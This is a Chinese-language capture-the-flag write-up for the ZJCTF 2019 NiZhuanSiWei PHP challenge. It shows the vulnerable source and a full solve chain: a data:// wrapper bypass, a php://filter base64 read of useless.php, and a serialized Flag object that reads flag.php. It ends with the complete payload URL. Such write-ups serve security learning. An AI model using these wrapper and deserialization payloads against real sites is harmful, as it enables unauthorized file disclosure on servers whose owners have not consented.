[ZJCTF 2019]NiZhuanSiWei 1

[ZJCTF 2019]NiZhuanSiWei

题目运用的知识点

php伪协议

题目

打开发现是代码审计题,分析代码

 <?php   $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"];//三个赋值 if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){     echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";//这里是第一个绕过     if(preg_match("/flag/",$file)){         echo "Not now!";         exit();      }else{         include($file);  //useless.php         $password = unserialize($password);         echo $password;//这里是第二个需要绕过的点     } } else{     highlight_file(__FILE__); } ?>  

分析代码

(file_get_contents($text,'r')` 

这个函数把整个文件读入一个字符串中。
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存[ZJCTF 2019]NiZhuanSiWei 1
成功绕过第一个

再看第二个绕过点,上传的时候不能出现flag

if(preg_match("/flag/",$file)){         echo "Not now!";         exit(); }         else{         include($file);  //useless.php         $password = unserialize($password);         echo $password; 

我们将它base64一下,防止文件中包含的php代码直接当成命令来执行
/?file=php://filter/read=convert.base64-encode/resource=useless.php
得到一个base64加密的代码
[ZJCTF 2019]NiZhuanSiWei 1
解密得到PHP代码

 <?php    class Flag{  //flag.php       public $file;       public function __tostring(){           if(isset($this->file)){               echo file_get_contents($this->file);              echo "<br>";         return ("U R SO CLOSE !///COME ON PLZ");         }       }   }   ?> 

我们将它直接反序列化得到

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
最后的payload为?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
[ZJCTF 2019]NiZhuanSiWei 1
得到FLAG

版权声明:玥玥 发表于 2021-03-26 14:10:06。
转载请注明:[ZJCTF 2019]NiZhuanSiWei 1 | 女黑客导航